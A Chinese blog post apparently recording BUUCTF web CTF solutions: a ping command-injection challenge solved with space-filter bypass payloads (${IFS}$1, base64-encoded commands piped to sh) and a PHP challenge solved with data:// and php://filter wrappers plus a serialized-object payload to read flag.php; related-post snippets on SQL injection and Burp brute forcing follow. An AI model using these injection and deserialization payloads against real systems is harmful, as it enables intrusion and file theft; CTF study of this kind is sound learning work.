buuctf web刷题记录

最新推荐文章于 2024-03-22 08:55:52 发布
最新推荐文章于 2024-03-22 08:55:52 发布
阅读量480 收藏
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/giaogiao123/article/details/108955501
版权

空格过滤常见ctfweb题目中
*

第一题

在这里插入图片描述
大佬的博客,持续学习学习学习
https://www.ghtwf01.cn/index.php/archives/273/

通过学习知道怎么样绕过
以buuctf在这里插入图片描述

首先使用burp抓包看看过滤了什么字符
基本上大部分字符都被过滤了,就很烦人
尝试构造?ip=127.0.0.1;ls
发现有两个东西
在这里插入图片描述
构造cat falg.php发现被过滤了,这怎么办???
flag被过滤,空格也被过滤
尝试%09发现不行
尝试nl%09*
发现被过滤了*
也就是说想要一键出flag不可能
上网查查过滤怎么办发现可以构造
${IFS}$1
尝试构造

?ip=127.0.0.1;nl${IFS}$1index.php
在这里插入图片描述看到bash被过滤了
卧槽
但是sh没有被过滤,flag也没了
想想可以
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
base64解码
用sh在bash下大部分都能运行
或者
变量拼接↓

我们看到源码中有一个$a变量可以覆盖

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

在这里插入图片描述

··············································································································································································································································································

第二题

在这里插入图片描述

在这里插入图片描述
这道题的知识点就很多了,首先是绕过===,我们必须得上传文件,但好像没有办法上传文件,所以考虑data为协议
https://www.cnblogs.com/ichunqiu/p/10683379.html

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

方法一

第一绕过text
这里需要我们传入一个文件且其内容为welcome to the zjctf,这样的话往后面看没有其他可以利用的点,我们就无法写入文件再读取,就剩下了一个data伪协议。data协议通常是用来执行PHP代码,然而我们也可以将内容写入data协议中然后让file_get_contents函数取读取。构造如下:

text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

第二文件包含
因为我们知道php文件内容不会在页面中呈现出来,所以我们要利用filter协议使php文件内容呈现出来
我们可以构造

file=php://filter/read=convert.base64-encode/resource=useless.php

php://filter之前最常出镜的地方是XXE。由于XXE漏洞的特殊性,我们在读取HTML、PHP等文件时可能会抛出此类错误parser
error : StartTag: invalid element name 。其原因是,PHP是基于标签的脚本语言,<?php …
?>这个语法也与XML相符合,所以在解析XML的时候会被误认为是XML,而其中内容(比如特殊字符)又有可能和标准XML冲突,所以导致了出错。

那么,为了读取包含有敏感信息的PHP等源文件,我们就要先将“可能引发冲突的PHP代码”编码一遍,这里就会用到php://filter。

之后我们会解码base64

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}

连接在一起

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
     class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

很明显了最后要传入一个password并且想要最后输出文件内存必须要走魔法函数
所以我们先序列化password,之后魔法函数遇到序列化内容就会执行函数最后输出
file_get_contents($this->file);注意一点我们在序列化时要序列化flag.php,这样才会输入flag

<?php 
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}   
$a= new flag();
$a->file="flag.php";
echo(serialize($a));
?>

最后payload

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=:&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

欢迎大佬的各种骚操作

【网络安全 | CTF】BUUCTF Brute 1解题详析(BurpSuite爆破实战)
等风来
04-28 8260
4、Cluster bomb:每个变量对应一个字典,并且交集破解尝试每一个组合,每个用户和每个密码进行匹配,两个字典。找到返回长度异于其它payload的请求(在此实例中即为admin),响应页面回显。2、Battering ran:对变量进行同时破解,用户名和密码相同,仅一个字典。由上可知,发送到第6491个请求时才爆破出密码为6491,而这个过程是十分慢的。3、pitch fork:每个变量对应一个字典,用户名和密码一一对应,两个字典。单独抓包时回显仅用户名错误,考虑先爆破用户名。
BUUCTFweb题记
夜幕下的灯火阑珊的博客
04-03 2963
[极客大挑战 2019]BabySQL 本题过滤了or from by where ,用双写绕过即可
ctf-web题记
xaioluobo的博客
09-13 885
ctf-web小白
Web】CTFSHOW 常用姿势题记(全)
uuzeray的博客
02-25 2741
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
NSSCTF web 题记1
rev1ve的博客
09-04 2136
今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。
BUUCTF-题记-5
qq_45628145的博客
10-03 1060
MISC [GKCTF2020]code obfuscation 把给的二维码缩小一下,截个图,就可以用QR扫出来了,得到一个base(gkctf),同时binwalk分离出来一个存在密码的压缩包,猜测是某种base方法得到的结果为压缩包的密码。 最后尝试出来base58编码后的gkctf即为压缩包的密码,即CfjxaPF。 解压出来一张图片和一段JS代码,JS代码去这个在线网站解密并且整理一下,得到 for n in a b c d e f g h i j k l m n o p q r s t u v
BUUCTF-题记-10
qq_45628145的博客
10-07 1593
MISC [watevrCTF 2019]Unspaellablle 词频分析,没有什么结果,然后看文件前面很有规律的样子,看起来像个什么文章?直接谷歌搜索到一个差不多的,不过有一点区别,链接。 然后去linux下面使用vimdiff命令查看两个文件的差别,发现把差别字符提取出来也就是flag了。 vimdiff 1.txt 2.txt 也就是watevr{icantspeel_tiny.cc/2qtdez}。 [INSHack2018]Spreadshit 搜索空格,全部选中,发现flag:INSA{
[BUUCTF]题记8
Huamang的博客
08-21 321
[De1CTF 2019]SSRF Me python代码审计 ssrf hash拓展攻击 flask题 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding(
BUUCTF-题记-7
qq_45628145的博客
10-04 2317
MISC [GUET-CTF2019]soul sipse steghide工具分析得到一个文件,无密码 得到一个链接 文件头错误,修复一下 得到这么一串Unicode字符 进行解码,得到 4070 1234 把其相加得到5304即为flag [MRCTF2020]pyFlag 010分析发现,每一张图片最后面都有一段信息,把其按照顺序组合起来,得到一个加密得zip,爆破得到密码1234 提示说flag被套娃base加密了 后面的0x10、0x20、0x30、0x55代表的应该也就是base16
[BUUCTF]题记6
Huamang的博客
04-04 531
[WUSTCTF2020]朴实无华 目扫描 intval函数的科学记数法绕过 MD5加密后与加密前相等 直接去扫目,扫到了fl4g.php if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt
BUUCTF/BUU BURP COURSE 1
weixin_44041994的博客
03-22 1089
使用burp suite拦截,在数据包中添加字段:X-Real-IP: 127.0.0.1 以及 Content-Length: 0。在数据包中添加X-Real-IP: 127.0.0.1后发送,成功获得flag。同样打开burp suite拦截后,点击登。打开靶机提示,页面提示"只能本地访问。发送后进入一个登界面。输入flag,闯关成功。
BUUCTF Basic BUU BURP COURSE 1解题WP
打工人
03-27 3328
1.启动靶机 访问靶机发现网页提示只能本机访问: 可能是检查请求头只的X-Real-IP字段。 2.使用BP测试 BP抓包,添加X-Real-IP:127.0.0.1测试,发现返回登界面且包含登信息: 3.根据上述信息,更改使用POST方法提交username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe 获取flag{69a567b4-7864-47f6-b854-186ad981de40} ...
BUUCTF Brute 1使用BurpSuite爆破详解
热门推荐
bill_fang的博客
08-28 1万+
最近研究一下白帽子安全,主要关注WEB安全,在做完了常规的靶场xsslab、SQLI、DVWA、Pikachu后,了解了白帽子安全的基础知识。进一步开始用一些CTF来练习。本文是从BUUCTF网站上,去解一个WEB的Flag的详细记。0x00打开BUUCTF,打开靶机BUUCTF的地址在这里:BUUCTF在线评测 (buuoj.cn),进入后选择Basic->BUU BRUTE1.选择B...
BUUCTF部分题练习
yqdid的博客
05-03 663
[强网杯 2019]随便注 看题目的样子应该是sq注入 先添加单引号 1',发现有报错; 用order by 语句查询到有两列 1' order by 2 # 然后准备用union select 联合查询数据库时,页面回显了过滤提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 根据提示,上面...
php 远程文件包含配置项,文件包含漏洞总结 - ghtwf01 - Welcome to ghtwf01's blog
weixin_29246195的博客
03-11 593
文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间文件包含函数require()require_once()include()include_once()include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错...
【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 3062
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
ctfshow题-web3
m0_52011198的博客
02-22 210
php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。include里面的参数是url,提示了可以利用php://伪协议来进行代码执行。猜测ctf_go_go_go中含有flag,利用cat命令进行查看,得到flag。利用burp进行抓包,在包中写入想要执行对的代码,先使用ls命令查看一下文件。
ctf-web bugku题(1)
农夫果园好好喝的博客
06-19 357
点开一看看得我头晕,这玩意是越蹦越快。 点开F12,flag就安静的躺在这里。 让我输入正确的答案,但是我只能输入一个数字,大概是需要修改源码。 修改为10. 点击验证,flag到手。(referer–来源伪造,x-forwarded–ip伪造,user-agent–用户浏览器,cookie–维持登状态,用户身份识别)这个源码比较简单,就是说我们输入参数,就给flag。 使用hackbar给他参数赋值。 得到flag,就是不知道为什么有两个。和上一个题一样的界面,只不过换成了POST传参。 直
[GXYCTF2019]Ping Ping Ping 1
weixin_46601529的博客
09-27 1240
1.看到ip很明显传一个Ip看看 作为菜鸟,我根据自己的判断认为通过Ip传输方式认为是linux所以我们可以在这里输入linux命令常用的就是ls 那么怎么输入命令呢,我们要用到管道符,啥玩意是管道符。。。。就是; | || & &&这类后面可以跟着其他命令,至于具体怎么用 2.我们看到两个文件,完了进行访问,但是发现flag.php访问不了,大概是说有空格, 4.那就去绕过空格呗,完了一个个试最后$IFS$1可以,完了去访问flag.php还是不行说flag又被
buuctfweb
最新发布
01-17
### BUUCTF Web 类型题目题练习 #### 网站源码备份文件泄露和PHP反序列化 在BUUCTF平台上,有一道涉及网站源码备份文件泄露和PHP反序列化的题目。这类题目通常要求参赛者找到并利用服务器上存在的`.bak`或其他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值